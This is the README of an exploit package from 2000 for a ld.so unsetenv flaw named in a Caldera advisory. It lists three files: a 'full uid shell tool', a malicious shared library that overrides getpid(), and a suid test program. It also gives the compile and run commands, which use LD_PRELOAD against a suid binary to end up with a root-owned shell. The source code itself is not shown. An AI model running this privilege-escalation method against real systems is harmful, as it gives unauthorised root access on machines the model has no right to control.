hi

this code demostrates the recent ld.so unsetenv problem
announced by Caldera 8.24.2000
http://www.calderasystems.com/support/security/advisories/CSSA-2000-028.0.txt

i haven't tested against a wild suid program, with the exception of the
preloadtest.c code. theortically if the proper conditions are met, suid 
programs can be broken with rumple.c. 

- nimrood@efnet
8.28.2000

fr.c 		- full uid shell tool
rumple.c 	- the 'new' getpid() shared lib function
preloadtest.c	- suid program with vulnerable conditions

	% gcc -o fr fr.c
	% gcc -shared -O3 -ldl -o rumple.so rumple.c

	# gcc -o preloadtest preloadtest.c
	# chown root preloadtest
	# chmod 4755 preloadtest
	
	% export LD_PRELOAD=./rumple.so
	% ./preloadtest
	% unset LD_PRELOAD
	% ls -l fr

